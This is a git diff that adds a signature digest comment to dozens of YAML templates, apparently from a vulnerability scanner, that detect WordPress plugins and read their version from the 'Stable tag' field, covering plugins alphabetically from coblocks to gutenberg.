a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..1cb97b65e9 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066711c9810c3b5fee89683c846feb15b467602cd22bb6e8bfc2adacdfb6cb06d022100f71224c339581a949fa7979dbf699d64aa683cab832aea1158cb46c8ff0e9ded:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..c7bc973789 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009521b2ba258347f0435593990ae5ec1ebe1268442126ea9d9058dc8470e14116022100f16c4de57107d947d72f1753035300f8bedaede4e41d06091906e6c1752a337c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..73e7273086 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7025a66c3dd94d81e25dec09767de9fb27385222aa18d57ab1a939a95b3a6a90220306d2622d13b9aabf25c6a774ebfcf71c7f6fd326fc505c4f99f23af8381728a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..b6af028fac 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202e447fdf008ebbcae01890b27fdb0697407957e76e1c7da64f86c343fb8d6ade02204e434d98277d60d335ce5bdd50d8404dd35a47485a43cfdc67c9f866d12080f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..74e3b6a4a6 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d494f810a6f4d5fc4563c81e168b46586be799429262544cf909aa1786bc24dc022100847b68c12c45f846a3d74a85cd7b331d1832340ca7f6ccce32e43636482f9325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..57dca5503e 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203aa1520ae065e7d3396d9a2b9cd38ba7b54611ed562f8f50962021ab414803ad022100dcbbf55ef56b06b3f992d684ac373464235b95472a766ffe22ee3c67e68f0195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..85337d6a4f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ff6b602f997149a9645fc94dab2abb666008e1145c986049db08510ce0f26606022100bd2b57473d14e688278447322737b3c1733a73ba07725580c4c8fc36101d0079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index d94b4228a9..795b436050 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fae3c23257c786cb7d368f3c70724bd279f2b0f09961bb8123a519fa7780f5b002204027c0dbbc4acbe4769d8d54739dda2dc401eff8ea88c62f4b61ca4c5dba914e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..e21c6a8557 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a19e4f1f5a40b85e624c6d82f78dd7f6ceb20a2f08f6f127bf35f9da704123f402201fa8e38f5de252424f0bd63092e0eae961465c648a1cc8aec9872ec757900022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 1b4769d0a7..d53d241efb 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c41505c2f4e9e9fd0a63bc56336c34c2f3fa54a048dab29a97439aeed58a45b022029e550bc4bcaf71678d29c0279b6964f9e889d49f1b9ac0a9b40e24e4fbeabf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index c2cd4ede1b..5f54cbbc8a 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017190d4e0600cee35a6039c67f3101f14fb84674502a4a8b3c1f42bda6f3a6d4022100d801f3b6a2915391568421d889b558fd754d91188a16ff669f5674dec1eb675e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 03e6c13ec5..81bb8eb9f3 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d15e4964fb8c658ae9685d92d77e4d9328315278d0c471ebb6619e081301b8e402204b59a0e729515cb9b41976fd399f08e5ef3fe78944c7914929412dd7dc0642ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..3a9de5b880 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220693529eb0b1c99412a37ec348860113ca537dd5630951f218ccf4ad89f0c4dd302202c50e21ed62782f80609090966497262c3f8f15be342e6225cfd4bbc497c32dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..e0ccc515e6 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf0237828665109f20bea6692c87295471b9d84a08833510b14c39d235b4e24502206455aeb5c0c6a2e3061b6885d97f8e846bef560925a58673af831fd0855d5c6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..1469d6f29f 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fcf841b929ec197bc4af653d60c216e97e91e1e256e23d361ee0a8c073548d31022029616aedf8116b6103de1fd539493ba69e4355fbaad734dd0a590c451154d106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..a30c641b56 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202875858b23f8bae1f97e11af42b6c1af630dd1d896854c9b962ba95d19517c6c02200770db6ae23592e1ceb41bd51ed95ed78751dca894262c8f0b7764da6cafec0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..8739e18936 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207cb12bed7faffd61d959127002baf122d08bd62fcf91b81141395f02d394ad50022058810ae5b20c2067fe9a44b98a32285dd2bde4d9e09ec4562d9704a26e42bcdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..1a3f74cee0 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022011d66dbf7cb8830c012236b1527c017f34c6e9ac9f218edb1b380f8bca08907e02203ae29ecf77ba15006c61965c28eb657970b8f10a21644ca75e9ecd4ecb2f25cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..5b1a7d5c5e 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022058fb649b37d40f2ce36eaa3e2affaa65b18cad1e3321eda527cf67b72a0b64b6022100cc9fc5793d6b491ea946c10c37b7616ce05cff79caa69a7043ab860822bfe958:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index d74de07e8e..d308e6ccd3 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022008b538e2d23c38518741edb1fca70d615e2bfefd1efcdbdff2faad2647244f45022100e83cfd5137b82f7d699ca56b48ed2a5010e32d87d79009b588fec4b9ce09b9d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index e5cfe47925..26ef580076 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a1b8cb34947641f721882c5b617056770ed24bc424a38e945429c3ca86352f2e022100836a00d3ccc7d9ac9ea047e958f971761a5f106af51260dd47751b4fbfe8f5dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..b5df76c376 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022079e84354ec34b88f2fb6fecb8f175a1d86ce612e77119c65b7bbe1925bce7597022100e7bc9d0a22f2c143563bbdbe2a754c501599af12b46af4ecdde17f88e526cac9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..1c68f31f9d 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206409193310603f4f53f070b32ddab3d2891811f273b8c39d6d3027cf26aae68702205dc3cc9a9dd2ef3f93cfa8afd3f4296b4914dcd40dbbabba1df0ad124951c715:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..b4bcde0605 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cc68e527afc986ccd1b62e02b80be960a368d560fdcfa2409ccb61eec36700e6022100d9fcb8d4b6a6bc4bee0b1eb9560c3ffec7934dc46f43ae17e1d861f30d4f8f05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..abf13dff60 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022055c9538641c7bd08dee5f3cf6cd8d33af8eed8f3a9f8928d23c894addfbce44b0220696813c9a84f506fc8dd43d753b919666219c322c295783726c45a5b53822d4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..ca0dc77afe 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da36672ae5d8a58333e5b5828608e52371b482be0bb9b1825066f917257db07602200de6fab28e8cb977242e4957f5ca7e34985e33fe0758927f8bdbe5327f8cb957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..ce49e72efd 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b5defbcea174775dd45a8313825a6f4568db4dae0efb655d79ccd45c17433c902210097766192bce8a6a311e5937d2b3d5a2fb4836582353d151d45591820872cb583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index d86e0557ae..d0ebc43bf6 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210092294d136b6d863d344b5fe7764efad541745693f37388badd6c6eef348997e7022051702fb969e2cffd99d7aaefded9871048ac4aa8a1047a8ad9f49d6e1bfeb85c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..f341330b16 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022007455a5837d79f082bf2d3c3ededb4d55538bf702d77026ed8855a13100846cb02201946c9525a48baa2be9d91d31d69e68d7b245a1ce52d675cd41fce7665496be5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 4ae34395fa..c014200ffb 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022039fae3505b17910074c8fc4f847fcabb671ad32fe520800cbef2b5b71b2cdc71022100bdbdbc2b417a73a42266c2c761a5da0507c946a91e59b2f4a9f25976d68b1c7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..73938b5641 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f43050adb047aa8b8b5044ccc47f30524522e9933e56d866b0da609f48fff08022100f25c25503541f53783d2b20b74e7129996a3f6c543ec3807b2e849b642f3e27c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..7f84331983 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009ea29c6e5721957efa296efcb6d45f6a1b8be55a94cf8d3215b0f45a181a86e5022100fdb05dc5b5549306648b5d1460f3939db9226abd8dc50661f14aa19e048b1855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..c1f233ca74 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220686f362299ed53a0a6884d1ff33783edf328603d92e8539eb219634accbeb808022100c1017c0a6d8d2316c6bcfea36dce848b7eb21ce1e658bf5db36a44c36607644c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index aa36122d85..51254c2d3c 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022016b01da7a1b0598bf0bae54e6549747ccd45d010a372ba528966390949961e9e022100b4519b782615fe6543f1420a5106453598d29912ec2cc231b453de05b25bff1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..ac84610b72 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022030ab61dbff5632e02ff5c8866ee9c396487fd937324449002cb34daa5609af1902203f23d944d2306b89f56b17eb4f46bd7e8d430e9ea4c4d267e67119965b38b0cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..f9585bc827 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ab335787a66bef7da7add6ceb1b130f852d66f55bf500aad77b9e9636b55e80f022070628428f3d025a62bd537571f831bbefacceb13affb6e205c06ab12964f5c26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1d00a5705d..924e1db196 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069a94efd7f32e53b72a7fd2c64fcee192289cb5a219c69945389ad6e31d2289c022100c282e0174dd3c68cec76ad92f04639c3d8ff97341af9a1b0961db2537dea4413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..b3528f25fc 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207a6dab933f9fe6de788bf3d4845e29eb4bf4f20cb97b794490915ddac416a5ad022100ffa97b10af3672a6bad77ec22ae96f985e51d88f623c0a16a4e0fd12476ae73b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..0bf63cf561 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203737257956ecfd7ca6178e02c055da2f5aed3959a21dd72eff9116d44b3224d30221009db7e05073a67d4aee3d489b352da20622fe844d4a185eef31fb2898ddb4e38d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 3dbb03067b..700393f1ee 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200fc161eb5095f9a3b90b8b778f0f36da5836fe5dfe895e121a31af0aa7a090e802205619e3ec4c9655799cca9bf1b0b5945467a56c1da49db010378baa7229fd241e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..eb667dff4d 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d5862b8c261cf4eace49e2202941f016dd01150d2d83b84c011f123ac39cf26c022100951260b46595849ea171ad7a0da5de73632acca798dc7e0851ad626b05556de0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..013dbc9eb1 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220404a29ef9a0bf802158382cf210919df40585338581c926acf6e6c4bc7a3494802207317c7fea0637fa520dee3c58e3c5437db9170fb951948ae8622289347d23d0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..1e8617a2a6 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ef5f20b12a730a7ec82bd14fedbfe39db9e0921b5c72ad74437f9f33a35f4fb30221009a4fe699ef2d472a1c17b5f1b3b2cbb3397a8083a89d050f3aa0f3a281d2d755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..4d31f7e12f 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ce19027dc173b08d45cdc8dcb8bed783dddfc8643cf29b36c13d8c37803cf880022030d339b22fe99c654022ae1c92a378bb2c8bb6d43521b9dde34f8414b60fb597:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..aac49a60dc 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203961d9859eb82c15f94d022ec1cc55802232a00eb3d959bf21c57fcd91107b7b022100ec74fd1183ef413dafc4b120b3eee7d7ddfbe660345911a36e8a7594ebbad982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..56aa29b4be 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b2c06851380cf5a88c286935f82f7e03175b62ec2b0e66aff2bf81a06a72f8190221009d8ee585c8c8128ecdfe3b518bf13cf32234fd2d27f05b059b8581e7c8be31e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..88170b9c99 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc4c8c11cc517e6ec87e522b35da769c5fc4d5bca47b53510e27643df3e7c29b02206549054ffdb9ef703bafe165e7c3e55e33012876ee30d808725cc2c86a6f1906:922c64590222798bb761d5b6d8e72950 \ No 